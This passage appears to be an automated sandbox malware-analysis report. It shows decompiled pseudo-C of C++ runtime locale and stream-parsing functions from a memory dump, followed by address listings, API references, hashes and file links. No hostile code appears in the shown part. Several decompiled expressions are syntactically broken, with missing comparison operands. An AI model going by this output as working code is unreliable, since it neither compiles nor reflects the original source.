																	} while (_t209 != 0);
																}
																_v116 = _t234;
																_v88 = 0xf;
																_v92 = 0;
																_v108 = 0;
																E003060B0( &_v108, _t234, 0);
																_t235 = _v0;
																_t249 = 0xfffffffe;
																_t288 = _v4;
																_v132 = 1;
																while(1) {
																	_t272 = 0;
																	_v128 = _t249;
																	_t291 = 0;
																	_v129 = 0;
																	_v120 = 0;
																	__eflags = _v116;
																	if(_v116 <= 0) {
																		break;
																	} else {
																		goto L43;
																	}
																	do {
																		L43:
																		_t250 = _a8;
																		_t166 =  *((intOrPtr*)(_t291 + _t250));
																		__eflags = _t166;
																		if(_t166 != 0) {
																			_t261 =  *_t250;
																			_t236 = _a8;
																			while(1) {
																				__eflags = _t166 - _t261;
																				if(_t166 == _t261) {
																					break;
																				}
																				_t166 =  *((intOrPtr*)(_t291 + _t236 + 1));
																				_t291 = _t291 + 1;
																				__eflags = _t166;
																				if(_t166 != 0) {
																					continue;
																				}
																				break;
																			}
																			_t235 = _v0;
																			_t250 = _a8;
																		}
																		__eflags = _v88 - 0x10;
																		_t168 =  >=  ? _v108 :  &_v108;
																		__eflags =  *((char*)(_t168 + _t272));
																		if( *((char*)(_t168 + _t272)) == 0) {
																			_t291 = _t291 + _v124;
																			_t169 = _t291 + _t250;
																			_v112 = _t169;
																			_t170 =  *_t169;
																			__eflags = _t170 -  *_t250;
																			if(_t170 ==  *_t250) {
																				L88:
																				__eflags = _v88 - 0x10;
																				_t274 =  >=  ? _v108 :  &_v108;
																				__eflags = _v124 - 0x7f;
																				_t252 =  <  ? _v124 & 0x000000ff : 0x7f;
																				_t173 = _v120;
																				 *((char*)(( >=  ? _v108 :  &_v108) + _t173)) =  <  ? _v124 & 0x000000ff : 0x7f;
																				_t272 = _t173;
																				_t249 = _t272;
																				_v128 = _t249;
																				goto L89;
																			} else {
																				__eflags = _t170;
																				if(_t170 == 0) {
																					goto L88;
																				} else {
																					__eflags = _t288[1];
																					if(_t288[1] == 0) {
																						_t260 =  *_t288;
																						__eflags = _t260;
																						if(_t260 == 0) {
																							L60:
																							 *_t288 = 0;
																						} else {
																							_t283 =  *( *(_t260 + 0x1c));
																							__eflags = _t283;
																							if(_t283 == 0) {
																								L57:
																								_t204 =  *((intOrPtr*)( *_t260 + 0x18))();
																							} else {
																								__eflags =  *( *(_t260 + 0x2c));
																								if( *( *(_t260 + 0x2c)) <= 0) {
																									goto L57;
																								} else {
																									_t204 =  *_t283 & 0x000000ff;
																								}
																							}
																							__eflags = _t204 - 0xffffffff;
																							if(_t204 == 0xffffffff) {
																								goto L60;
																							} else {
																								_t288[1] = _t204;
																							}
																						}
																						_t288[1] = 1;
																					}
																					__eflags = _t235[1];
																					if(_t235[1] == 0) {
																						_t259 =  *_t235;
																						__eflags = _t259;
																						if(_t259 == 0) {
																							L70:
																							 *_t235 = 0;
																						} else {
																							_t282 =  *( *(_t259 + 0x1c));
																							__eflags = _t282;
																							if(_t282 == 0) {
																								L67:
																								_t200 =  *((intOrPtr*)( *_t259 + 0x18))();
																							} else {
																								__eflags =  *( *(_t259 + 0x2c));
																								if( *( *(_t259 + 0x2c)) <= 0) {
																									goto L67;
																								} else {
																									_t200 =  *_t282 & 0x000000ff;
																								}
																							}
																							__eflags = _t200 - 0xffffffff;
																							if(_t200 == 0xffffffff) {
																								goto L70;
																							} else {
																								_t235[1] = _t200;
																							}
																						}
																						_t235[1] = 1;
																					}
																					_t256 =  *_t288;
																					__eflags = _t256;
																					if(_t256 != 0) {
																						__eflags =  *_t235;
																						if( *_t235 != 0) {
																							goto L74;
																						} else {
																							goto L76;
																						}
																					} else {
																						__eflags =  *_t235 - _t256;
																						if( *_t235 != _t256) {
																							L76:
																							__eflags = _t288[1];
																							if(_t288[1] == 0) {
																								__eflags = _t256;
																								if(_t256 == 0) {
																									L84:
																									 *_t288 = 0;
																								} else {
																									_t281 =  *( *(_t256 + 0x1c));
																									__eflags = _t281;
																									if(_t281 == 0) {
																										L81:
																										_t196 =  *((intOrPtr*)( *_t256 + 0x18))();
																									} else {
																										__eflags =  *( *(_t256 + 0x2c));
																										if( *( *(_t256 + 0x2c)) <= 0) {
																											goto L81;
																										} else {
																											_t196 =  *_t281 & 0x000000ff;
																										}
																									}
																									__eflags = _t196 - 0xffffffff;
																									if(_t196 == 0xffffffff) {
																										goto L84;
																									} else {
																										_t288[1] = _t196;
																									}
																								}
																								_t288[1] = 1;
																							}
																							__eflags =  *_v112 - _t288[1];
																							if( *_v112 != _t288[1]) {
																								goto L74;
																							} else {
																								_t272 = _v120;
																								_t174 = 1;
																								_t249 = _v128;
																								_v129 = 1;
																							}
																						} else {
																							L74:
																							__eflags = _v88 - 0x10;
																							_t280 =  >=  ? _v108 :  &_v108;
																							__eflags = _v124 - 0x7f;
																							_t258 =  <  ? _v124 & 0x000000ff : 0x7f;
																							_t191 = _v120;
																							 *((char*)(( >=  ? _v108 :  &_v108) + _t191)) =  <  ? _v124 & 0x000000ff : 0x7f;
																							_t272 = _t191;
																							_t249 = _v128;
																							goto L89;
																						}
																					}
																				}
																			}
																		} else {
																			__eflags = _v88 - 0x10;
																			_t249 = _v128;
																			_t207 =  >=  ? _v108 :  &_v108;
																			_t291 = _t291 +  *((char*)(( >=  ? _v108 :  &_v108) + _t272));
																			L89:
																			_t174 = _v129;
																		}
																		_t272 = _t272 + 1;
																		_v120 = _t272;
																		__eflags = _t272 - _v116;
																	} while (_t272 < _v116);
																	__eflags = _t174;
																	if(_t174 != 0) {
																		__eflags = _t288[1];
																		if(_t288[1] == 0) {
																			_t255 =  *_t288;
																			__eflags = _t255;
																			if(_t255 == 0) {
																				L100:
																				 *_t288 = 0;
																			} else {
																				_t278 =  *( *(_t255 + 0x1c));
																				__eflags = _t278;
																				if(_t278 == 0) {
																					L97:
																					_t187 =  *((intOrPtr*)( *_t255 + 0x18))();
																				} else {
																					__eflags =  *( *(_t255 + 0x2c));
																					if( *( *(_t255 + 0x2c)) <= 0) {
																						goto L97;
																					} else {
																						_t187 =  *_t278 & 0x000000ff;
																					}
																				}
																				__eflags = _t187 - 0xffffffff;
																				if(_t187 == 0xffffffff) {
																					goto L100;
																				} else {
																					_t288[1] = _t187;
																				}
																			}
																			_t288[1] = 1;
																		}
																		__eflags = _t235[1];
																		if(_t235[1] == 0) {
																			_t254 =  *_t235;
																			__eflags = _t254;
																			if(_t254 == 0) {
																				L110:
																				 *_t235 = 0;
																			} else {
																				_t277 =  *( *(_t254 + 0x1c));
																				__eflags = _t277;
																				if(_t277 == 0) {
																					L107:
																					_t183 =  *((intOrPtr*)( *_t254 + 0x18))();
																				} else {
																					__eflags =  *( *(_t254 + 0x2c));
																					if( *( *(_t254 + 0x2c)) <= 0) {
																						goto L107;
																					} else {
																						_t183 =  *_t277 & 0x000000ff;
																					}
																				}
																				__eflags = _t183 - 0xffffffff;
																				if(_t183 == 0xffffffff) {
																					goto L110;
																				} else {
																					_t235[1] = _t183;
																				}
																			}
																			_t235[1] = 1;
																		}
																		_t253 =  *_t288;
																		__eflags = _t253;
																		if(_t253 != 0) {
																			__eflags =  *_t235;
																			if( *_t235 != 0) {
																				goto L114;
																			} else {
																				goto L118;
																			}
																		} else {
																			__eflags =  *_t235 - _t253;
																			if( *_t235 != _t253) {
																				L118:
																				_v124 = _v124 + 1;
																				__eflags = _t253;
																				if(_t253 == 0) {
																					L125:
																					 *_t288 = 0;
																					_t249 = _t253 | 0xffffffff;
																					_t288[1] = 1;
																					continue;
																				} else {
																					__eflags =  *( *(_t253 + 0x1c));
																					if( *( *(_t253 + 0x1c)) == 0) {
																						L122:
																						_t177 = ( *_t253)[0x1c]();
																					} else {
																						_t275 =  *(_t253 + 0x2c);
																						_t178 =  *_t275;
																						__eflags = _t178;
																						if(_t178 <= 0) {
																							goto L122;
																						} else {
																							 *_t275 = _t178 - 1;
																							_t253 =  *(_t253 + 0x1c);
																							_t276 =  *_t253;
																							 *_t253 =  &(_t276[1]);
																							_t177 =  *_t276 & 0x000000ff;
																						}
																					}
																					__eflags = _t177 - 0xffffffff;
																					if(_t177 == 0xffffffff) {
																						goto L125;
																					} else {
																						_t288[1] = 0;
																						_t249 = _t253 | 0xffffffff;
																						continue;
																					}
																				}
																				goto L127;
																			} else {
																				L114:
																				_t249 = _v128;
																			}
																		}
																	}
																	break;
																}
																__eflags = _v88 - 0x10;
																if(_v88 < 0x10) {
																	return _t249;
																} else {
																	L0030DF6A(_v108);
																	return _v128;
																}
															} else {
																_t290 = _v12;
																 *0x333a50 = _t290;
																 *((intOrPtr*)( *_t290 + 4))();
																E00308645(_t290);
																goto L34;
															}
														} else {
															E00309A52( &_v20);
															return _t233;
														}
													} else {
														_t290 =  *( *((intOrPtr*)(_t214 + 8)) + _t287 * 4);
														goto L29;
													}
												}
											}
										}
									} else {
										_t289 = _v8;
										 *0x333a58 = _t289;
										 *((intOrPtr*)( *_t289 + 4))();
										E00308645(_t289);
										goto L16;
									}
								} else {
									E00309A52( &_v16);
									return _t232;
								}
							} else {
								_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t225 + 8)) + _t286 * 4));
								goto L11;
							}
						}
					}
				}
				L127:
			}





















































































                                            0x00307a8e
                                            0x00307a93
                                            0x00307a99
                                            0x00307a9f
                                            0x00307aa4
                                            0x00307aaa
                                            0x00307aaf
                                            0x00307ab5
                                            0x00307ab7
                                            0x00307abc
                                            0x00307abd
                                            0x00307ac2
                                            0x00307ac2
                                            0x00307aca
                                            0x00307acf
                                            0x00307acf
                                            0x00307ad8
                                            0x00307add
                                            0x00307aeb
                                            0x00307aeb
                                            0x00000000
                                            0x00307adf
                                            0x00307ae2
                                            0x00307ae7
                                            0x00307b4b
                                            0x00307b4e
                                            0x00307b5b
                                            0x00307ae9
                                            0x00307aed
                                            0x00307af1
                                            0x00307b03
                                            0x00307b05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307af3
                                            0x00307af3
                                            0x00307afb
                                            0x00307b07
                                            0x00307b09
                                            0x00307b25
                                            0x00307b2a
                                            0x00307b2d
                                            0x00307b30
                                            0x00307b64
                                            0x00307b72
                                            0x00307b77
                                            0x00307b78
                                            0x00307b79
                                            0x00307b7a
                                            0x00307b7b
                                            0x00307b7c
                                            0x00307b7d
                                            0x00307b7e
                                            0x00307b7f
                                            0x00307b81
                                            0x00307b86
                                            0x00307b87
                                            0x00307b88
                                            0x00307b8e
                                            0x00307b93
                                            0x00307b99
                                            0x00307b9f
                                            0x00307ba2
                                            0x00307ba4
                                            0x00307baa
                                            0x00307baf
                                            0x00307bb5
                                            0x00307bb7
                                            0x00307bbc
                                            0x00307bbc
                                            0x00307bbd
                                            0x00307bc2
                                            0x00307bc2
                                            0x00307bca
                                            0x00307bcf
                                            0x00307bcf
                                            0x00307bd8
                                            0x00307bda
                                            0x00307bdd
                                            0x00307beb
                                            0x00307beb
                                            0x00000000
                                            0x00307bdf
                                            0x00307be2
                                            0x00307be5
                                            0x00307be7
                                            0x00307c4b
                                            0x00307c4e
                                            0x00307c5b
                                            0x00307be9
                                            0x00307bed
                                            0x00307bed
                                            0x00307bf1
                                            0x00307c03
                                            0x00307c03
                                            0x00307c05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307bf3
                                            0x00307bf3
                                            0x00307bf8
                                            0x00307bfb
                                            0x00307c07
                                            0x00307c07
                                            0x00307c09
                                            0x00307c25
                                            0x00307c2d
                                            0x00307c30
                                            0x00307c64
                                            0x00307c72
                                            0x00307c77
                                            0x00307c78
                                            0x00307c79
                                            0x00307c7a
                                            0x00307c7b
                                            0x00307c7c
                                            0x00307c7d
                                            0x00307c7e
                                            0x00307c7f
                                            0x00307c80
                                            0x00307c86
                                            0x00307c8c
                                            0x00307c8e
                                            0x00307c8f
                                            0x00307c92
                                            0x00307c93
                                            0x00307c94
                                            0x00307c96
                                            0x00307c98
                                            0x00307ca0
                                            0x00307ca0
                                            0x00307ca2
                                            0x00307ca4
                                            0x00307ca4
                                            0x00307ca4
                                            0x00307ca5
                                            0x00307ca8
                                            0x00307ca9
                                            0x00307ca9
                                            0x00307ca0
                                            0x00307cb4
                                            0x00307cb8
                                            0x00307cc0
                                            0x00307cc8
                                            0x00307ccd
                                            0x00307cd2
                                            0x00307cd5
                                            0x00307cda
                                            0x00307cdd
                                            0x00307ce5
                                            0x00307ce5
                                            0x00307ce7
                                            0x00307ceb
                                            0x00307ced
                                            0x00307cf2
                                            0x00307cf6
                                            0x00307cfa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d00
                                            0x00307d00
                                            0x00307d00
                                            0x00307d03
                                            0x00307d06
                                            0x00307d08
                                            0x00307d0a
                                            0x00307d0c
                                            0x00307d10
                                            0x00307d10
                                            0x00307d12
                                            0x00000000
                                            0x00000000
                                            0x00307d14
                                            0x00307d18
                                            0x00307d19
                                            0x00307d1b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d1b
                                            0x00307d1d
                                            0x00307d20
                                            0x00307d20
                                            0x00307d23
                                            0x00307d2c
                                            0x00307d31
                                            0x00307d35
                                            0x00307d54
                                            0x00307d58
                                            0x00307d5b
                                            0x00307d5f
                                            0x00307d61
                                            0x00307d63
                                            0x00307e7d
                                            0x00307e7d
                                            0x00307e8f
                                            0x00307e94
                                            0x00307e9b
                                            0x00307e9e
                                            0x00307ea2
                                            0x00307ea5
                                            0x00307ea7
                                            0x00307ea9
                                            0x00000000
                                            0x00307d69
                                            0x00307d69
                                            0x00307d6b
                                            0x00000000
                                            0x00307d71
                                            0x00307d71
                                            0x00307d75
                                            0x00307d77
                                            0x00307d79
                                            0x00307d7b
                                            0x00307da2
                                            0x00307da2
                                            0x00307d7d
                                            0x00307d80
                                            0x00307d82
                                            0x00307d84
                                            0x00307d93
                                            0x00307d95
                                            0x00307d86
                                            0x00307d89
                                            0x00307d8c
                                            0x00000000
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d8c
                                            0x00307d98
                                            0x00307d9b
                                            0x00000000
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9b
                                            0x00307da8
                                            0x00307da8
                                            0x00307dac
                                            0x00307db0
                                            0x00307db2
                                            0x00307db4
                                            0x00307db6
                                            0x00307ddd
                                            0x00307ddd
                                            0x00307db8
                                            0x00307dbb
                                            0x00307dbd
                                            0x00307dbf
                                            0x00307dce
                                            0x00307dd0
                                            0x00307dc1
                                            0x00307dc4
                                            0x00307dc7
                                            0x00000000
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dc7
                                            0x00307dd3
                                            0x00307dd6
                                            0x00000000
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd6
                                            0x00307de3
                                            0x00307de3
                                            0x00307de7
                                            0x00307de9
                                            0x00307deb
                                            0x00307e24
                                            0x00307e27
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307ded
                                            0x00307ded
                                            0x00307def
                                            0x00307e29
                                            0x00307e29
                                            0x00307e2d
                                            0x00307e2f
                                            0x00307e31
                                            0x00307e58
                                            0x00307e58
                                            0x00307e33
                                            0x00307e36
                                            0x00307e38
                                            0x00307e3a
                                            0x00307e49
                                            0x00307e4b
                                            0x00307e3c
                                            0x00307e3f
                                            0x00307e42
                                            0x00000000
                                            0x00307e44
                                            0x00307e44
                                            0x00307e44
                                            0x00307e42
                                            0x00307e4e
                                            0x00307e51
                                            0x00000000
                                            0x00307e53
                                            0x00307e53
                                            0x00307e53
                                            0x00307e51
                                            0x00307e5e
                                            0x00307e5e
                                            0x00307e68
                                            0x00307e6b
                                            0x00000000
                                            0x00307e6d
                                            0x00307e6d
                                            0x00307e71
                                            0x00307e73
                                            0x00307e77
                                            0x00307e77
                                            0x00307df1
                                            0x00307df1
                                            0x00307df1
                                            0x00307e03
                                            0x00307e08
                                            0x00307e0f
                                            0x00307e12
                                            0x00307e16
                                            0x00307e19
                                            0x00307e1b
                                            0x00000000
                                            0x00307e1b
                                            0x00307def
                                            0x00307deb
                                            0x00307d6b
                                            0x00307d37
                                            0x00307d37
                                            0x00307d40
                                            0x00307d44
                                            0x00307d4d
                                            0x00307ead
                                            0x00307ead
                                            0x00307ead
                                            0x00307eb1
                                            0x00307eb2
                                            0x00307eb6
                                            0x00307eb6
                                            0x00307ec0
                                            0x00307ec2
                                            0x00307ec8
                                            0x00307ecc
                                            0x00307ece
                                            0x00307ed0
                                            0x00307ed2
                                            0x00307ef9
                                            0x00307ef9
                                            0x00307ed4
                                            0x00307ed7
                                            0x00307ed9
                                            0x00307edb
                                            0x00307eea
                                            0x00307eec
                                            0x00307edd
                                            0x00307ee0
                                            0x00307ee3
                                            0x00000000
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ee3
                                            0x00307eef
                                            0x00307ef2
                                            0x00000000
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef2
                                            0x00307eff
                                            0x00307eff
                                            0x00307f03
                                            0x00307f07
                                            0x00307f09
                                            0x00307f0b
                                            0x00307f0d
                                            0x00307f34
                                            0x00307f34
                                            0x00307f0f
                                            0x00307f12
                                            0x00307f14
                                            0x00307f16
                                            0x00307f25
                                            0x00307f27
                                            0x00307f18
                                            0x00307f1b
                                            0x00307f1e
                                            0x00000000
                                            0x00307f20
                                            0x00307f20
                                            0x00307f20
                                            0x00307f1e
                                            0x00307f2a
                                            0x00307f2d
                                            0x00000000
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2d
                                            0x00307f3a
                                            0x00307f3a
                                            0x00307f3e
                                            0x00307f40
                                            0x00307f42
                                            0x00307f6a
                                            0x00307f6d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307f44
                                            0x00307f44
                                            0x00307f46
                                            0x00307f6f
                                            0x00307f6f
                                            0x00307f73
                                            0x00307f75
                                            0x00307fb0
                                            0x00307fb0
                                            0x00307fb6
                                            0x00307fb9
                                            0x00000000
                                            0x00307f77
                                            0x00307f7a
                                            0x00307f7d
                                            0x00307f9a
                                            0x00307f9c
                                            0x00307f7f
                                            0x00307f7f
                                            0x00307f82
                                            0x00307f84
                                            0x00307f86
                                            0x00000000
                                            0x00307f88
                                            0x00307f89
                                            0x00307f8b
                                            0x00307f8e
                                            0x00307f93
                                            0x00307f95
                                            0x00307f95
                                            0x00307f86
                                            0x00307f9f
                                            0x00307fa2
                                            0x00000000
                                            0x00307fa4
                                            0x00307fa4
                                            0x00307fa8
                                            0x00000000
                                            0x00307fa8
                                            0x00307fa2
                                            0x00000000
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f46
                                            0x00307f42
                                            0x00000000
                                            0x00307ec2
                                            0x00307f4c
                                            0x00307f51
                                            0x00307fca
                                            0x00307f53
                                            0x00307f57
                                            0x00307f69
                                            0x00307f69
                                            0x00307c32
                                            0x00307c32
                                            0x00307c37
                                            0x00307c3f
                                            0x00307c43
                                            0x00000000
                                            0x00307c48
                                            0x00307c0b
                                            0x00307c10
                                            0x00307c1d
                                            0x00307c1d
                                            0x00307bfd
                                            0x00307c00
                                            0x00000000
                                            0x00307c00
                                            0x00307bfb
                                            0x00307bf1
                                            0x00307be7
                                            0x00307b32
                                            0x00307b32
                                            0x00307b37
                                            0x00307b3f
                                            0x00307b43
                                            0x00000000
                                            0x00307b48
                                            0x00307b0b
                                            0x00307b10
                                            0x00307b1d
                                            0x00307b1d
                                            0x00307afd
                                            0x00307b00
                                            0x00000000
                                            0x00307b00
                                            0x00307afb
                                            0x00307af1
                                            0x00307ae7
                                            0x00000000

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00307A8E
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00307AAA
                                            • std::_Facet_Register.LIBCPMT ref: 00307B43
                                            • std::bad_exception::bad_exception.LIBCMT ref: 00307B64
                                              • Part of subcall function 0030D31B: std::exception::exception.LIBCMT ref: 0030D325
                                            • __CxxThrowException@8.LIBCMT ref: 00307B72
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::_$LockitLockit::_$ExceptionException@8Facet_RaiseRegisterThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
                                            • String ID: bad cast
                                            • API String ID: 3247575091-3145022300
                                            • Opcode ID: c86bfea167617ff01971f26d439e1e290432c43a7ca0737c51a263f14249385a
                                            • Instruction ID: 548240b32e6e219c4c9e2ac9f3571a8dbb1388a0d580268c12c8d827ce39a94e
                                            • Opcode Fuzzy Hash: c86bfea167617ff01971f26d439e1e290432c43a7ca0737c51a263f14249385a
                                            • Instruction Fuzzy Hash: BA31C531E062189BCB13DF98D8E1A9DF7B8EF54320F1541A9E8459B692DB31BE45CBC0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00307B80, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E00307B80(signed int* _a4, intOrPtr* _a12) {
				signed int* _v0;
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr* _v24;
				char _v28;
				intOrPtr _v48;
				signed int _v52;
				char _v68;
				intOrPtr* _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				char _v89;
				signed int _v92;
				intOrPtr _t136;
				intOrPtr* _t139;
				intOrPtr _t140;
				signed int _t143;
				signed int _t144;
				signed int _t147;
				intOrPtr _t148;
				signed int _t153;
				signed int _t157;
				signed int _t161;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				intOrPtr _t179;
				void* _t184;
				signed int _t189;
				signed int _t190;
				char _t191;
				intOrPtr _t192;
				signed int* _t193;
				intOrPtr _t194;
				signed int _t197;
				intOrPtr* _t200;
				signed int _t202;
				intOrPtr* _t203;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t212;
				signed int _t213;
				intOrPtr _t214;
				void* _t219;
				intOrPtr _t220;
				signed int _t221;
				intOrPtr* _t224;
				signed char* _t225;
				signed char* _t226;
				signed char* _t227;
				signed char* _t230;
				signed char* _t231;
				signed char* _t232;
				signed int _t234;
				signed int* _t235;
				intOrPtr* _t236;
				void* _t237;
				void* _t248;

				E003099F7( &_v16, 0);
				_t234 =  *0x333a60; // 0x0
				_t191 =  *0x333a50; // 0x0
				_v8 = _t191;
				if(_t234 == 0) {
					E003099F7( &_v12, _t234);
					_t248 =  *0x333a60 - _t234; // 0x0
					if(_t248 == 0) {
						_t189 =  *0x331924; // 0x1
						_t190 = _t189 + 1;
						 *0x331924 = _t190;
						 *0x333a60 = _t190;
					}
					E00309A52( &_v12);
					_t234 =  *0x333a60; // 0x0
				}
				_t197 =  *_a4;
				if(_t234 >=  *((intOrPtr*)(_t197 + 0xc))) {
					_t236 = 0;
					goto L8;
				} else {
					_t236 =  *((intOrPtr*)( *((intOrPtr*)(_t197 + 8)) + _t234 * 4));
					if(_t236 != 0) {
						L16:
						E00309A52( &_v16);
						return _t236;
					} else {
						L8:
						if( *((char*)(_t197 + 0x14)) == 0) {
							L11:
							if(_t236 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t184 = E0030866D();
							if(_t234 >=  *((intOrPtr*)(_t184 + 0xc))) {
								L12:
								if(_t191 == 0) {
									if(E00308170(_t219,  &_v8, _a4) == 0xffffffff) {
										E0030D31B( &_v28, "bad cast");
										E0030F4FA( &_v28, 0x32d290);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t200 = _v24;
										_t220 =  *_t200;
										_push(_t191);
										_t192 = _v28;
										_push(_t236);
										_push(_t234);
										if(_t220 != 0) {
											_t179 = _t220;
											do {
												if(_t179 == _t220) {
													_t192 = _t192 + 1;
												}
												_t179 =  *((intOrPtr*)(_t200 + 1));
												_t200 = _t200 + 1;
											} while (_t179 != 0);
										}
										_v76 = _t192;
										_v48 = 0xf;
										_v52 = 0;
										_v68 = 0;
										E003060B0( &_v68, _t192, 0);
										_t193 = _a4;
										_t202 = 0xfffffffe;
										_t235 = _v0;
										_v92 = 1;
										while(1) {
											_t221 = 0;
											_v88 = _t202;
											_t237 = 0;
											_v89 = 0;
											_v80 = 0;
											if(_v76 <= 0) {
												break;
											} else {
												goto L25;
											}
											do {
												L25:
												_t203 = _a12;
												_t136 =  *((intOrPtr*)(_t237 + _t203));
												if(_t136 != 0) {
													_t214 =  *_t203;
													_t194 = _a12;
													while(_t136 != _t214) {
														_t136 =  *((intOrPtr*)(_t237 + _t194 + 1));
														_t237 = _t237 + 1;
														if(_t136 != 0) {
															continue;
														}
														break;
													}
													_t193 = _a4;
													_t203 = _a12;
												}
												_t138 =  >=  ? _v68 :  &_v68;
												if( *((char*)(( >=  ? _v68 :  &_v68) + _t221)) == 0) {
													_t237 = _t237 + _v84;
													_t139 = _t237 + _t203;
													_v72 = _t139;
													_t140 =  *_t139;
													if(_t140 ==  *_t203 || _t140 == 0) {
														_t223 =  >=  ? _v68 :  &_v68;
														_t205 =  <  ? _v84 & 0x000000ff : 0x7f;
														_t143 = _v80;
														 *((char*)(( >=  ? _v68 :  &_v68) + _t143)) =  <  ? _v84 & 0x000000ff : 0x7f;
														_t221 = _t143;
														_t202 = _t221;
														_v88 = _t202;
														goto L71;
													} else {
														if(_t235[1] == 0) {
															_t213 =  *_t235;
															if(_t213 == 0) {
																L42:
																 *_t235 = 0;
															} else {
																_t232 =  *( *(_t213 + 0x1c));
																if(_t232 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x2c)))) <= 0) {
																	_t174 =  *((intOrPtr*)( *_t213 + 0x18))();
																} else {
																	_t174 =  *_t232 & 0x000000ff;
																}
																if(_t174 == 0xffffffff) {
																	goto L42;
																} else {
																	_t235[1] = _t174;
																}
															}
															_t235[1] = 1;
														}
														if(_t193[1] == 0) {
															_t212 =  *_t193;
															if(_t212 == 0) {
																L52:
																 *_t193 = 0;
															} else {
																_t231 =  *( *(_t212 + 0x1c));
																if(_t231 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x2c)))) <= 0) {
																	_t170 =  *((intOrPtr*)( *_t212 + 0x18))();
																} else {
																	_t170 =  *_t231 & 0x000000ff;
																}
																if(_t170 == 0xffffffff) {
																	goto L52;
																} else {
																	_t193[1] = _t170;
																}
															}
															_t193[1] = 1;
														}
														_t209 =  *_t235;
														if(_t209 != 0) {
															if( *_t193 != 0) {
																goto L56;
															} else {
																goto L58;
															}
														} else {
															if( *_t193 != _t209) {
																L58:
																if(_t235[1] == 0) {
																	if(_t209 == 0) {
																		L66:
																		 *_t235 = 0;
																	} else {
																		_t230 =  *( *(_t209 + 0x1c));
																		if(_t230 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t209 + 0x2c)))) <= 0) {
																			_t166 =  *((intOrPtr*)( *_t209 + 0x18))();
																		} else {
																			_t166 =  *_t230 & 0x000000ff;
																		}
																		if(_t166 == 0xffffffff) {
																			goto L66;
																		} else {
																			_t235[1] = _t166;
																		}
																	}
																	_t235[1] = 1;
																}
																if( *_v72 != _t235[1]) {
																	goto L56;
																} else {
																	_t221 = _v80;
																	_t144 = 1;
																	_t202 = _v88;
																	_v89 = 1;
																}
															} else {
																L56:
																_t229 =  >=  ? _v68 :  &_v68;
																_t211 =  <  ? _v84 & 0x000000ff : 0x7f;
																_t161 = _v80;
																 *((char*)(( >=  ? _v68 :  &_v68) + _t161)) =  <  ? _v84 & 0x000000ff : 0x7f;
																_t221 = _t161;
																_t202 = _v88;
																goto L71;
															}
														}
													}
												} else {
													_t202 = _v88;
													_t177 =  >=  ? _v68 :  &_v68;
													_t237 = _t237 +  *((char*)(( >=  ? _v68 :  &_v68) + _t221));
													L71:
													_t144 = _v89;
												}
												_t221 = _t221 + 1;
												_v80 = _t221;
											} while (_t221 < _v76);
											if(_t144 != 0) {
												if(_t235[1] == 0) {
													_t208 =  *_t235;
													if(_t208 == 0) {
														L82:
														 *_t235 = 0;
													} else {
														_t227 =  *( *(_t208 + 0x1c));
														if(_t227 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t208 + 0x2c)))) <= 0) {
															_t157 =  *((intOrPtr*)( *_t208 + 0x18))();
														} else {
															_t157 =  *_t227 & 0x000000ff;
														}
														if(_t157 == 0xffffffff) {
															goto L82;
														} else {
															_t235[1] = _t157;
														}
													}
													_t235[1] = 1;
												}
												if(_t193[1] == 0) {
													_t207 =  *_t193;
													if(_t207 == 0) {
														L92:
														 *_t193 = 0;
													} else {
														_t226 =  *( *(_t207 + 0x1c));
